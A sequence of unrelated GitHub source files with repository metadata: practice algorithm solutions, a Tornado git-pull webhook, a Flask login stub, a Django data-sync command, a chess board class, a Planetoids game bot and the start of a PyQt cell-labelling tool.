lstm_sample, states = self.lstm(inputs, states)
outputs = self.linear(lstm_sample.squeeze(1))
predicted = outputs.max(1)[1]
sampled_ids.append(predicted.item())
inputs = self.embed(predicted).unsqueeze(1)
return sampled_ids | Joshua-Devadas/Image-Captioning | model.py | model.py | py | 2,228 | python | en | code | 0 | github-code | 90 |
2861734805 | class InsertionSort:
def my_insert_sort(self, nums: [int]):
print("Unsorted: ", nums)
# 从头到尾开始逐个放到合适的位置去
p = 1
while p <= len(nums):
# print("while1")
temp = p - 1
while temp > 0:
# print("while 2")
if nums[temp] < nums[temp - 1]:
nums[temp], nums[temp - 1] = nums[temp - 1], nums[temp]
temp -= 1
p += 1
print("Sorted: ", nums)
def lengthOfLastWord(self, s: str) -> int:
# this will return the length of the last word in certain string
print(s.split())
return 1
def searchInsert(self, nums: [int], target: int) -> int:
n = len(nums)
former, latter = 0, n - 1
while former <= latter:
mid = (former + latter) // 2
if nums[mid] == target:
return former
elif nums[mid] < target:
former = mid + 1
elif nums[mid] > target:
latter = mid - 1
return former
ii = InsertionSort()
# ii.my_insert_sort([2, 4, 1, 6, 7, 9, 3, 8, 5])
# print(ii.lengthOfLastWord(" fly me to the moon "))
# print(ii.lengthOfLastWord("a"))
print(ii.searchInsert([1, 3, 5, 6], 4))
| Teayyyy/LeetCodeStudy_Python_Algorithm | LeetCode101_Google/Different_Sort_Algorithms/Insertion_Sort.py | Insertion_Sort.py | py | 1,301 | python | en | code | 0 | github-code | 90 |
40673762692 | #!/usr/bin/env python
# -*- coding: utf-8 -*
# gohook @ Python
# Functions: WebHook自动部署代码
# Created By HavenShen on 2016-04-05,Version 0.1
import comm_log
import subprocess
import json
import tornado.ioloop
import tornado.web
import tornado.options
from tornado.options import define, options
#监听端口
define("port", default=8765, help="run on the given port", type=int)
#日志输出
define("log", default=comm_log.get_logging('gohook'))
#希望自动部署项目路径
file_path = '/home/wwwroot/xxx'
def pull():
cmd = ['git','pull']
p = subprocess.Popen(cmd,cwd=file_path)
p.wait()
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.write('get done.')
def post(self):
data = tornado.escape.json_decode(self.request.body)
if data['token'] == 'gohook':
pull()
options.log.info('git pull done.')
else:
options.log.info('git pull error.[token is false]')
self.write('post done.')
application = tornado.web.Application([
(r"/gohook", MainHandler),
])
if __name__ == "__main__":
application.listen(options.port)
tornado.ioloop.IOLoop.instance().start()
| HavenShen/gohook | main.py | main.py | py | 1,118 | python | en | code | 51 | github-code | 90 |
20465221239 | import sys
n, m = map(int, sys.stdin.readline().split())
result = []
for i in range(1, n+1):
result.append(str(i))
for _ in range(m):
i, j = map(int, sys.stdin.readline().split())
i_value, j_value = result[i-1], result[j-1]
result[i-1], result[j-1] = j_value, i_value
print(' '.join(result)) | undervi/coding_test_python | 백준/Bronze/10813. 공 바꾸기/공 바꾸기.py | 공 바꾸기.py | py | 328 | python | en | code | 1 | github-code | 90 |
72604514537 | """
DO NOT RUN IN PRODUCTION
Updates a local db with data on the current production site.
"""
from __future__ import unicode_literals
import json
import requests
from dateutil import parser
from tempfile import NamedTemporaryFile
from django.conf import settings
from django.core.files import File
from django.core.management.base import BaseCommand, CommandError
from django.template.defaultfilters import slugify
from classes.models import ApeClass
from events.models import Event
from pages.models import Page, Widget, PersonFocusWidget, TextWidget, ImageCarouselItem, ImageCarouselWidget, \
ApeClassesWidget, BannerWidget, EventsWidget, PeopleWidget, HouseTeamFocusWidget, PressClippingWidget
from people.models import Person, HouseTeam, HouseTeamMembership
PAGES_TO_CREATE = [
'home',
'classes',
'shows',
'talent',
'faculty',
'houseteams',
'hype',
]
BASE_URL = 'https://theapetheater.org'
UNSUPPORTED_WIGDET_TYPES = ['audio', 'videoswidget', 'video_focus']
class Command(BaseCommand):
def create_person_from_json(self, person_json):
first, last = person_json['name'].split(' ')
person, created = Person.objects.get_or_create(first_name=first, last_name=last)
if created:
print('Created new person: {}'.format(person))
if not person.headshot.name or person.headshot.name == '':
try:
image_url = '{}{}'.format(BASE_URL, person_json['image'])
except KeyError:
image_url = '{}{}'.format(BASE_URL, person_json['image_url'])
image = requests.get(image_url)
img_temp = NamedTemporaryFile(delete=True)
img_temp.write(image.content)
img_temp.flush()
person.headshot = None
person.headshot.save('{}.jpg'.format(slugify(person_json['name'])), File(img_temp), save=True)
person.bio = person_json['bio']
person.save()
return person
def create_person_focus_widget_from_json(self, focus_json):
first, last = focus_json['person']['name'].split(' ')
person = Person.objects.filter(first_name=first, last_name=last).first()
if not person:
person = self.create_person_from_json(focus_json['person'])
widget, created = PersonFocusWidget.objects.get_or_create(name='{}'.format(person.last_name), person=person)
return widget
def create_house_team_focus_widget_from_json(self, focus_json):
team_name = focus_json['house_team']['name']
team, created = HouseTeam.objects.get_or_create(name=team_name)
if 'logo' in focus_json['house_team']:
banner_url = '{}{}'.format(BASE_URL, focus_json['house_team']['logo']['image']['url'])
team.banner = self.create_banner_widget_from_url(banner_url, team.name)
if 'performers' in focus_json['house_team']:
for performer in focus_json['house_team']['performers']:
first, last = performer['name'].split(' ')
try:
person = Person.objects.get(first_name=first, last_name=last)
except Person.DoesNotExist:
print('House team {} references performer {}, who has not been created yet.'.format(team.name, performer['name']))
continue
HouseTeamMembership.objects.get_or_create(house_team=team, person=person)
print('added {} to {}'.format(person, team))
if 'image_carousel' in focus_json['house_team']:
team.image_carousel = self.create_carousel_widget_from_json(focus_json['house_team']['image_carousel'])
team.show_time = focus_json['house_team']['show_time']
team.save()
widget, created = HouseTeamFocusWidget.objects.get_or_create(name='{}'.format(team.name), house_team=team)
return widget
def create_class_from_json(self, class_json):
ape_class, created = ApeClass.objects.get_or_create(name=class_json['name'], price=class_json['price'])
if created:
print('created new ape class: {}'.format(ape_class.name))
ape_class.class_type = class_json['type']
ape_class.num_sessions = class_json['num_sessions']
ape_class.bio = class_json['bio']
ape_class.price = class_json['price']
ape_class.class_length = class_json['class_length']
ape_class.start_date = parser.parse(class_json['start_date'])
if ape_class.banner is None:
image_url = '{}{}'.format(BASE_URL, class_json['image'])
banner = self.create_banner_widget_from_url(url=image_url, name=ape_class.name)
ape_class.banner = banner
ape_class.save()
return ape_class
def create_show_from_json(self, show_json):
show, created = Event.objects.get_or_create(name=show_json['name'],
start_time=parser.parse(show_json['start_time']),
ticket_price=show_json['ticket_price'])
show.bio = show_json['bio']
if show.banner is None:
image_url = '{}{}'.format(BASE_URL, show_json['image'])
show.banner = self.create_banner_widget_from_url(image_url, show.name)
show.save()
return show
def create_text_widget_from_json(self, widget_json):
text_widget, created = TextWidget.objects.get_or_create(name=widget_json['name'])
text_widget.content = widget_json['text']
text_widget.text_color = widget_json['text_color']
text_widget.width = widget_json['width']
text_widget.save()
return text_widget
def create_press_clipping_widget_from_json(self, widget_json):
press_widget, created = PressClippingWidget.objects.get_or_create(name=widget_json['name'])
press_widget.content = widget_json['text']
press_widget.text_color = widget_json['text_color']
press_widget.background_color = widget_json['background_color']
press_widget.author = widget_json['author']
press_widget.external_link = widget_json['external_link']
press_widget.width = widget_json['width']
press_widget.save()
return press_widget
def create_carousel_widget_from_json(self, widget_json):
carousel_widget, created = ImageCarouselWidget.objects.get_or_create(name=widget_json['name'])
carousel_widget.width = widget_json['width']
for count, image in enumerate(widget_json['images']):
item, created = ImageCarouselItem.objects.get_or_create(carousel=carousel_widget, sort_order=count)
item.path = image['path']
image_url = '{}{}'.format(BASE_URL, image['image']['url'])
image = requests.get(image_url)
img_temp = NamedTemporaryFile(delete=True)
img_temp.write(image.content)
img_temp.flush()
item.image = None
item.image.save('{}.jpg'.format(item.id), File(img_temp), save=True)
print('added ImageCarouselItem {} to the {} Image Carousel'.format(item.id, carousel_widget.name))
return carousel_widget
def create_banner_widget_from_url(self, url, name):
image = requests.get(url)
img_temp = NamedTemporaryFile(delete=True)
img_temp.write(image.content)
img_temp.flush()
banner_widget = BannerWidget.objects.create(name=name)
banner_widget.image.save('{}.jpg'.format(name), File(img_temp), save=True)
print('added new banner: {}'.format(banner_widget.name))
return banner_widget
def create_widget_from_json(self, widget_json):
widget_type = widget_json['type']
if widget_type in UNSUPPORTED_WIGDET_TYPES:
print('skipping audio/video widget: {}'.format(widget_json['name']))
return None
elif widget_type == 'text':
widget = self.create_text_widget_from_json(widget_json)
elif widget_type == 'image_carousel':
widget = self.create_carousel_widget_from_json(widget_json)
elif widget_type == 'person_focus':
widget = self.create_person_focus_widget_from_json(widget_json)
elif widget_type == 'house_team_focus':
widget = self.create_house_team_focus_widget_from_json(widget_json)
elif widget_type == 'press_clipping':
widget = self.create_press_clipping_widget_from_json(widget_json)
elif widget_json['item_type'] is not None:
if widget_json['item_type'] == 'ape_class':
widget, created = ApeClassesWidget.objects.get_or_create(name=widget_json['name'])
widget.display_type = widget_type
widget.width = widget_json['width']
widget.type = widget_json['type']
for item in widget_json['items']:
ape_class = self.create_class_from_json(item)
widget.ape_classes.add(ape_class)
elif widget_json['item_type'] == 'event':
widget, created = EventsWidget.objects.get_or_create(name=widget_json['name'])
widget.display_type = widget_type
widget.width = widget_json['width']
widget.type = widget_json['type']
widget.upcoming_events = widget_json['upcoming_events']
widget.upcoming_events_window = widget_json['upcoming_events_window']
widget.save()
for item in widget_json['items']:
show = self.create_show_from_json(item)
elif widget_json['item_type'] == 'person':
widget, created = PeopleWidget.objects.get_or_create(name=widget_json['name'])
widget.display_type = widget_type
widget.width = widget_json['width']
widget.type = widget_json['type']
widget.save()
for item in widget_json['items']:
person = self.create_person_from_json(item)
widget.people.add(person)
else:
widget = None
return widget
def update_slugged_page(self, slug):
page, created = Page.objects.get_or_create(name=slug, slug=slug)
page.page_to_widgets.all().delete()
page_url = '{}/api/{}.json'.format(BASE_URL, slug)
response = requests.get(page_url)
response_json = json.loads(response.content.decode())
for widget_json in response_json['widgets']:
widget = self.create_widget_from_json(widget_json)
if widget:
page.add_widget(widget)
print('added {} to the {} page'.format(widget, slug))
def handle(self, *args, **options):
# disallow running in production
if settings.DEBUG:
Page.objects.all().delete()
Widget.objects.all().delete()
for slug in PAGES_TO_CREATE:
print('UPDATING: {} page'.format(slug))
self.update_slugged_page(slug)
print('Finished updating {} page\n'.format(slug))
# we create just the Ape TV page, downloading its video widgets and
# reuploading them would take quite a while
page, created = Page.objects.get_or_create(name='Ape TV', slug='apetv')
| zachcalvert/the_ape_theater | the_ape/pages/management/commands/update_local.py | update_local.py | py | 11,368 | python | en | code | 3 | github-code | 90 |
3588013289 | from flask import Flask, request, redirect
app = Flask(__name__, static_url_path='')
@app.route('/',methods=["POST", "GET"])
def index():
return app.send_static_file('index.html')
@app.route('/login', methods=["POST", "GET"])
def login():
if (request.method == "POST"):
req=request.form
print(req)
if req['lpw']=="asdf":
return redirect('minecraft.html')
return app.send_static_file('index.html') | gnsensors/website | app.py | app.py | py | 444 | python | en | code | 0 | github-code | 90 |
71940042857 | from Piece import Queen, King, Bishop, Knight, Rook, Pawn
import copy
class Board():
"""
8 ▢▢▢▢▢▢▢▢
▢▢▢▢▢▢▢▢
. ▢▢▢▢▢▢▢▢
. ▢▢▢▢▢▢▢▢
. ▢▢▢▢▢▢▢▢
▢▢▢▢▢▢▢▢
▢▢▢▢▢▢▢▢
1 ▢▢▢▢▢▢▢▢
1 ... 8
(a ... h)
"""
# parent should point at previous position
# children will eventually point at the following positions
def __init__(self, parent=None, debug=None) -> None:
self.parent = parent
self.children = []
if not parent == None:
self.white_pieces = copy.deepcopy(parent.white_pieces)
self.black_pieces = copy.deepcopy(parent.black_pieces)
else:
if parent == None and debug == None:
self.white_pieces = {
(1, 2): Pawn("w", "p"),
(2, 2): Pawn("w", "p"),
(3, 2): Pawn("w", "p"),
(4, 2): Pawn("w", "p"),
(5, 2): Pawn("w", "p"),
(6, 2): Pawn("w", "p"),
(7, 2): Pawn("w", "p"),
(8, 2): Pawn("w", "p"),
(1, 1): Rook("w", "r"),
(2, 1): Knight("w", "n"),
(3, 1): Bishop("w", "b"),
(4, 1): Queen("w", "q"),
(5, 1): King("w", "k"),
(6, 1): Bishop("w", "b"),
(7, 1): Knight("w", "n"),
(8, 1): Rook("w", "r")
}
self.black_pieces = {
(1, 7): Pawn("b", "p"),
(2, 7): Pawn("b", "p"),
(3, 7): Pawn("b", "p"),
(4, 7): Pawn("b", "p"),
(5, 7): Pawn("b", "p"),
(6, 7): Pawn("b", "p"),
(7, 7): Pawn("b", "p"),
(8, 7): Pawn("b", "p"),
(1, 8): Rook("b", "r"),
(2, 8): Knight("b", "n"),
(3, 8): Bishop("b", "b"),
(4, 8): Queen("b", "q"),
(5, 8): King("b", "k"),
(6, 8): Bishop("b", "b"),
(7, 8): Knight("b", "n"),
(8, 8): Rook("b", "r")
}
elif debug == "king":
self.white_pieces = {
(8, 8): King("w", "k")
}
self.black_pieces = {
(1, 1): King("b", "k")
}
else:
raise NotImplementedError
def copy_board(self):
child = Board(parent=self)
self.children.append(child)
return child
| confusedlama/chess | Board.py | Board.py | py | 2,327 | python | en | code | 0 | github-code | 90 |
5908654689 | # Problem description:
# https://github.com/HackBulgaria/Python-101-Forever/tree/master/C01-Python-Basics/24-C01P13
def is_prime(n):
counter = 0
for i in range(1, n + 1):
if n % i == 0:
counter += 1
return counter == 2
def next_prime(n):
n += 1
while not is_prime(n):
n += 1
return n
def prime_factorization(n):
result = []
p = 2
a = 0
while n != 1:
while n % p == 0:
a += 1
n = n // p
if a > 0:
result.append((p, a))
a = 0
p = next_prime(p)
return result
# Expected: [(2, 1), (5, 1)]
print(prime_factorization(10))
| keremidarski/python_playground | Python 101 Forever/C01 - Python Basics/c01p13_prime_factorization.py | c01p13_prime_factorization.py | py | 738 | python | en | code | 0 | github-code | 90 |
37030184751 | import argparse
import os
parser = argparse.ArgumentParser(description='Bpe')
parser.add_argument('--data-dir', type=str, default=None,
help='method for bpe')
args = parser.parse_args()
if __name__ == '__main__':
datasets = os.listdir(args.data_dir)
lang1 = open(os.path.join(args.data_dir, datasets[0]), "r", errors='ignore')
lang2 = open(os.path.join(args.data_dir, datasets[1]), "r", errors='ignore')
with open(os.path.join("./", datasets[0]), 'w') as lang1_writer, \
open(os.path.join("./", datasets[1]), 'w') as lang2_writer:
for line_1, line_2 in zip(lang1.readlines(), lang2.readlines()):
lang1_writer.write(line_1.strip() + "\n")
lang2_writer.write(line_2.strip() + "\n")
| Chris19920210/DipML | preprocess/encode_check.py | encode_check.py | py | 763 | python | en | code | 4 | github-code | 90 |
2713873495 | import Client
import Memento
class Caretaker():
"""
The Caretaker works with all mementos via the base Memento interface.
"""
def __init__(self, Client: Client):
self._mementos = []
self._Client = Client
def backup(self):
self._mementos.append(self._Client.save())
def undo(self):
if not len(self._mementos):
return
memento = self._mementos.pop()
try:
self._Client.restore(memento)
except Exception:
self.undo() | dianabarbo/mementopattern | Caretaker.py | Caretaker.py | py | 533 | python | en | code | 0 | github-code | 90 |
10522601798 | #!/usr/bin/env python3
import sys
import json
import logging
from math import degrees, atan2, tan
logging.basicConfig(filename=r"D:\LibraryOfBabel\Projects\ICPCPlanetoids\MyAdditions\planetoids1.log",
level=logging.DEBUG,
filemode='w',
format='%(message)s')
def get_position_through_void(object_position):
x, y = object_position[0], object_position[1]
return [[x, y], [x+7600, y], [x-7600, y], [x, y+4200], [x, y-4200]]
def get_angle_to_object(object_position, ship_position, ship_rotation):
angle_to_object = degrees(atan2(object_position[1] - ship_position[1], object_position[0] - ship_position[0]))
angle_to_object = angle_to_object if angle_to_object >= 0 else angle_to_object + 360
return angle_to_object - ship_rotation if angle_to_object >= ship_rotation else angle_to_object - ship_rotation + 360
def worm_hole(object_position, ship_position, ship_rotation):
replicated_positions = get_position_through_void(object_position)
distances = [get_dist(pos, ship_position) for pos in replicated_positions]
min_dist = min(distances)
min_dist_index = distances.index(min_dist)
# angles_to_min = [get_angle_to_object(pos, ship_position, ship_rotation) for i, pos in enumerate(replicated_positions) if 0.8 * min_dist <= distances[i] <= 1.2 * min_dist]
angles_to_min = [get_angle_to_object(pos, ship_position, ship_rotation) for i, pos in enumerate(replicated_positions) if distances[i] == min_dist]
sorted_angles = sorted(angles_to_min, key=lambda x: min(x, 360-x))
return sorted_angles[0], min_dist
def get_dist(artifact_position, ship_position):
del_x = artifact_position[0] - ship_position[0]
del_y = artifact_position[1] - ship_position[1]
return (del_x ** 2 + del_y ** 2) ** 0.5
def get_new_artifact_position(object_position, ship_position, ship_rotation):
possible_pos = get_position_through_void(object_position)
distances = [get_dist(pos, ship_position) for pos in possible_pos]
min_dist = min(distances)
min_dist_index = distances.index(min_dist)
return possible_pos[min_dist_index]
def generate_command(thrust,
cw_rotation,
ccw_rotation,
bullet,
hyperspace,
change_state):
if cw_rotation and ccw_rotation:
logging.debug('both clockwise and counterclockwise rotations are enabled')
command = ''
command += '1' if thrust else '0'
command += '1' if cw_rotation else '0'
command += '1' if ccw_rotation else '0'
command += '1' if bullet else '0'
command += '1' if hyperspace else '0'
command += '1' if change_state else '0'
return command
while True:
raw_data = sys.stdin.readline()
if not raw_data:
break
data = json.loads(raw_data)
if "gameOver" in data and data["gameOver"]:
break
thrust, clockwise_rotation, counterclockwise_rotation, bullet, hyperspace, change_state = True, False, False, True, False, True
artifact_position = data['artfPos']
ship_position = data['shipPos']
ship_rotation = data['shipR']
# new_artifact_position = get_new_artifact_position(artifact_position, ship_position, ship_rotation)
# angle_to_artifact = get_angle_to_object(new_artifact_position, ship_position, ship_rotation)
angle_to_artifact, min_dist = worm_hole(artifact_position, ship_position, ship_rotation)
if angle_to_artifact > 5:
if 0 < angle_to_artifact <= 180:
counterclockwise_rotation = True
clockwise_rotation = False
else:
clockwise_rotation = True
counterclockwise_rotation = False
artifact_distance_threshold = 3000
artifact_angle_threshold = 3
# if get_dist(new_artifact_position, ship_position) < artifact_distance_threshold and angle_to_artifact > artifact_angle_threshold:
if min_dist < artifact_distance_threshold and angle_to_artifact > artifact_angle_threshold:
thrust = False
sys.stdout.write(generate_command(thrust, clockwise_rotation, counterclockwise_rotation, bullet, hyperspace, change_state) + "\n")
sys.stdout.flush() | IamMarcIvanov/icpc-gaming-ai-planetoids | planetoids_working_1.py | planetoids_working_1.py | py | 4,324 | python | en | code | 0 | github-code | 90 |
110878862 | plik = open('ciagi.txt')
data = plik.read().splitlines()
halfprime = []
for ciag in data:
liczba = int(ciag ,2)
y = liczba
czynniki = []
i = 2
while i <= y**0.5+1:
if(y%i == 0):
czynniki.append(i)
y //= i
else:
i += 1
if(y > 1):
czynniki.append(y)
if len(czynniki) == 2:
halfprime.append(liczba)
print('ilosc:', len(halfprime))
print('minimalna:', min(halfprime))
print('maksymalna:', max(halfprime)) | dexterowy/matura_inf | 63/63-3.py | 63-3.py | py | 498 | python | pl | code | 1 | github-code | 90 |
44157837319 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('delivery2', '0003_auto_20161126_1937'),
]
operations = [
migrations.CreateModel(
name='MessageRedirectUrl',
fields=[
('id', models.BigIntegerField(serialize=False, primary_key=True)),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f', null=True)),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f', null=True)),
('delivery', models.ForeignKey(verbose_name='\u0420\u0430\u0441\u0441\u044b\u043b\u043a\u0430', to='delivery2.Delivery')),
('href', models.ForeignKey(verbose_name='Url', blank=True, to='delivery2.EmailUrlTemplate', null=True)),
],
options={
'ordering': ['-created_at'],
'db_table': 'Delivery2_MessageRedirectUrl',
'verbose_name': 'Url',
'verbose_name_plural': 'Urls',
},
),
migrations.RemoveField(
model_name='redirecturl',
name='delivery',
),
migrations.AlterField(
model_name='emailsubject',
name='delivery',
field=models.ForeignKey(related_name='subjects', to='delivery2.Delivery'),
),
migrations.AlterField(
model_name='emailtemplate',
name='delivery',
field=models.ForeignKey(related_name='templates', to='delivery2.Delivery'),
),
migrations.DeleteModel(
name='RedirectUrl',
),
]
| denispan1993/vitaliy | applications/delivery2/migrations/0004_auto_20161128_0016.py | 0004_auto_20161128_0016.py | py | 1,877 | python | en | code | 0 | github-code | 90 |
864993384 | # finally = 예외 발생과 상관없이 항상 실행한다.
try:
inputdata = input(" : ")
numint = int(inputdata)
except:
print('exception')
numint = 0
else:
if numint % 2 == 0:
print ('짝수')
else:
print ( '홀수')
finally:
print(f'{inputdata}')
| jungwonguk/Education | 03.python 중급/31_finally/finally.py | finally.py | py | 310 | python | ko | code | 1 | github-code | 90 |
25713061542 | # Exponential search
x = 3
y = 4
n = 100
def good(t):
return t * x + t * y < n
l = 0
r = 1
step = 1
while good(r):
l = r
r += step
step *= 2
print(l, r)
while l < r - 1:
mid = (l + r) // 2
if good(mid):
l = mid
else:
r = mid
print(l, r) | HornbillFromMinsk/EPIC | Algos/Class Materials/Practice/binary_search_exponential_search.py | binary_search_exponential_search.py | py | 257 | python | en | code | 0 | github-code | 90 |
74808759337 | import sys
#ssys.stdin = open('input.txt','rt')
'''
정다면체
두 개의 정 N면체와 정 M면체의 두 개의 주사위를 던져서 나올 수 있는 눈의 합 중 가장 확
률이 높은 숫자를 출력하는 프로그램을 작성하세요.
정답이 여러 개일 경우 오름차순으로 출력합니다.
▣ 입력설명
첫 번째 줄에는 자연수 N과 M이 주어집니다. N과 M은 4, 6, 8, 12, 20 중의 하나입니다.
▣ 출력설명
첫 번째 줄에 답을 출력합니다.
▣ 입력예제 1
4 6
▣ 출력예제 1
5 6 7
'''
n, m = map(int, input().split())
res = {}
for i in range(1, n+1): # 1~n
for j in range(1, m+1): # 1~m
tmp = i + j # 최대값 : m+n, 최소값 : 2
if tmp not in res.keys(): # Dict에 없으면추가,
res[tmp]=0
res[tmp] += 1
max_val = max(res.values())
for k, v in res.items():
if v == max_val:
print(k, end=' ')
print()
| dpwns523/coding-test-practice | 섹션2/정다면체.py | 정다면체.py | py | 971 | python | ko | code | 0 | github-code | 90 |
21554767920 | '''
Implementation of an RL environment in a discrete graph space.
'''
import numpy as np
import gym
from gym import spaces
import networkx as nx
import math
from .. import env_configs
#------------------------------------------------------------------------------
'''An ambulance environment over a simple graph. An agent interacts through
the environment by [EXPLAIN HOW ENVIRONMENT WORKS HERE] the ambulance. Then
a patient arrives and the ambulance most go and serve the arrival, paying a
cost of travel.'''
class AmbulanceGraphEnvironment(gym.Env):
"""
Custom Environment that follows gym interface.
This is a simple env where the arrivals are uniformly distributed across nodes
"""
metadata = {'render.modes': ['human']}
def __init__(self, config=env_configs.ambulance_graph_default_config):
'''
For a more detailed description of each parameter, see the readme file
epLen - number of time steps
arrival_dist - arrival distribution for calls over nodes
alpha - parameter for proportional difference in costs
edges - edges in the graph and their weights (nodes are automatically inferred)
starting_state - a list containing the starting nodes for each ambulance
num_ambulance - the number of ambulances in the environment
'''
super(AmbulanceGraphEnvironment, self).__init__()
self.config = config
self.epLen = config['epLen']
self.alpha = config['alpha']
self.graph = nx.Graph(config['edges'])
self.num_nodes = self.graph.number_of_nodes()
self.starting_state = config['starting_state']
self.state = self.starting_state
self.timestep = 0
self.num_ambulance = config['num_ambulance']
self.arrival_dist = config['arrival_dist']
self.from_data = config['from_data']
self.lengths = self.find_lengths(self.graph, self.num_nodes)
if self.from_data:
self.arrival_data = config['data']
self.episode_num = 0
# creates an array stored in space_array the length of the number of ambulances
# where every entry is the number of nodes in the graph
num_nodes = self.graph.number_of_nodes()
space_array = np.full(self.num_ambulance, num_nodes)
# creates a space where every ambulance can be located at any of the nodes
self.action_space = spaces.MultiDiscrete(space_array)
# The definition of the observation space is the same as the action space
self.observation_space = spaces.MultiDiscrete(space_array)
def reset(self):
"""
Reinitializes variables and returns the starting state
"""
# Initialize the timestep
self.timestep = 0
self.state = self.starting_state
if self.from_data:
self.episode_num += 1
return self.starting_state
def get_config(self):
return self.config
def step(self, action):
'''
Move one step in the environment
Args:
action - int list - list of nodes the same length as the number of ambulances,
where each entry i in the list corresponds to the chosen location for
ambulance i
Returns:
reward - float - reward based on the action chosen
newState - int list - new state of the system
done - 0/1 - flag for end of the episode
'''
old_state = self.state
# The location of the new arrival is chosen randomly from among the nodes
# in the graph according to the arrival distribution
prob_list = []
if self.from_data:
dataset_step = (self.episode_num * self.epLen + self.timestep) % len(self.arrival_data)
prob_list = self.arrival_dist(dataset_step, self.num_nodes, self.arrival_data)
else:
prob_list = self.arrival_dist(self.timestep, self.num_nodes)
new_arrival = np.random.choice(self.num_nodes, p=prob_list)
# Finds the distance traveled by all the ambulances from the old state to
# the chosen action, assuming that each ambulance takes the shortest path,
# which is stored in total_dist_oldstate_to_action
# Also finds the closest ambulance to the call based on their locations at
# the end of the action, using shortest paths
shortest_length = 999999999
closest_amb_idx = 0
closest_amb_loc = action[closest_amb_idx]
total_dist_oldstate_to_action = 0
for amb_idx in range(len(action)):
new_length = nx.shortest_path_length(self.graph, action[amb_idx], new_arrival, weight='travel_time')
total_dist_oldstate_to_action += nx.shortest_path_length(self.graph, self.state[amb_idx], action[amb_idx], weight='dist')
if new_length < shortest_length:
shortest_length = new_length
closest_amb_idx = amb_idx
closest_amb_loc = action[closest_amb_idx]
else:
continue
# Update the state of the system according to the action taken and change
# the location of the closest ambulance to the call to the call location
newState = np.array(action)
newState[closest_amb_idx] = new_arrival
obs = newState
# The reward is a linear combination of the distance traveled to the action
# and the distance traveled to the call
# alpha controls the tradeoff between cost to travel between arrivals and
# cost to travel to a call
# The reward is negated so that maximizing it will minimize the distance
reward = -1 * (self.alpha * total_dist_oldstate_to_action + (1 - self.alpha) * shortest_length)
# The info dictionary is used to pass the location of the most recent arrival
# so it can be used by the agent
info = {'arrival' : new_arrival}
if self.timestep != (self.epLen-1):
done = False
else:
done = True
self.state = newState
self.timestep += 1
return self.state, reward, done, info
def render(self, mode='console'):
if mode != 'console':
raise NotImplementedError()
def close(self):
pass
def find_lengths(self, graph, num_nodes):
'''
Given a graph, find_lengths first calculates the pairwise shortest distance
between all the nodes, which is stored in a (symmetric) matrix.
'''
dict_lengths = dict(nx.all_pairs_dijkstra_path_length(graph, cutoff=None, weight='travel_time'))
lengths = np.zeros((num_nodes, num_nodes))
for node1 in range(num_nodes):
for node2 in range(num_nodes):
lengths[node1, node2] = dict_lengths[node1][node2]
return lengths | maxsolberg/ORSuite | or_suite/envs/ambulance/ambulance_graph.py | ambulance_graph.py | py | 6,879 | python | en | code | 0 | github-code | 90 |
22659193230 | from collections import OrderedDict
import torch.nn as nn
import math
DEFAULT_LAYER_CONFIG = [
[383, 1024],
[1024, 1024],
[1024, 801]
]
def calculate_bias_bound(weights):
fan_in, _ = nn.init._calculate_fan_in_and_fan_out(weights)
bound = 1 / math.sqrt(fan_in)
return bound
def get_tanh_linear_layer(input_dim, output_dim):
layer = nn.Linear(input_dim, output_dim)
nn.init.xavier_uniform_(layer.weight, gain=nn.init.calculate_gain('tanh'))
bound = calculate_bias_bound(layer.weight)
nn.init.uniform_(layer.bias, -bound, bound)
return layer
def get_relu_linear_layer(input_dim, output_dim):
layer = nn.Linear(input_dim, output_dim)
nn.init.kaiming_uniform_(layer.weight, nonlinearity='relu')
bound = calculate_bias_bound(layer.weight)
nn.init.uniform_(layer.bias, -bound, bound)
return layer
class DNN(nn.Module):
def __init__(self, input_dim, output_dim, layer_config, non_linearity="relu"):
super(DNN, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.layer_config = layer_config
self.non_linearity = non_linearity
self.model = self.compose_model()
def forward(self, batch):
return self.model(batch)
def compose_model(self, layer_config=None):
if layer_config is None:
layer_config = self.layer_config
layers = OrderedDict()
for idx, config in enumerate(layer_config):
input_dim, output_dim = config
if self.non_linearity == "tanh":
layer = get_tanh_linear_layer(input_dim, output_dim)
layers['linear-%d' % idx] = layer
if idx != len(layer_config) - 1:
layers['nonlinear-%d' % idx] = nn.Tanh()
else:
layer = get_relu_linear_layer(input_dim, output_dim)
layers['linear-%d' % idx] = layer
if idx != len(layer_config) - 1:
layers['nonlinear-%d' % idx] = nn.ReLU()
return nn.Sequential(layers)
| teliov/thesislib | thesislib/utils/dl/models.py | models.py | py | 2,082 | python | en | code | 0 | github-code | 90 |
40655067194 | import sys
from PyQt5.QtCore import Qt ,pyqtSignal, QRect
from PyQt5.QtGui import QPalette
from PyQt5.QtWidgets import QProgressBar
import uuid
import pyqtgraph as pg
import pyqtgraph.graphicsItems as pgg
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
import imageio
import glob
import cv2
import os
import shutil
from PyQt5.QtWidgets import QApplication, QHBoxLayout, QLabel, QSizePolicy, QSlider, QSpacerItem, \
QVBoxLayout, QWidget, QFileDialog, QPushButton, QInputDialog
from tracking import extractMaskFromPoint
"""
Graphical interface - allow experienced user to label cycle of cells.
All outputs are saved into a folder 'Outputs' within the folder containing the images.
The saved files are:
- cells.csv: a csv file containing the time at which start eache phase. It also contains
the barycenter of the mask associated to the considered cell.
- Outputs/masks: the masks are saved in this folder when computed whith neural network. If masks
are loaded, they ae not saved.
- Outputs/zoom: save crop of images analysed with the interface. If a second channel is given,
they ar saved in the same folder with extension 'channel2_' preceding the name.
Authors: Valentin Debarnot, Léo Lebrat. 17/07/2019.
"""
## Uncomment to force not use GPU.
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = ""
ratioKept = True # Keep ratio of the images display.
type_im = np.uint8 # Format wanted by the neural network.
type_save = np.uint8 # Format of the croped images
minimalSize = 70 # Minimal number of pixel to say a mask is valid.
LSTM = False # Use a LSTM network.
normalize=False
"""
Slider class.
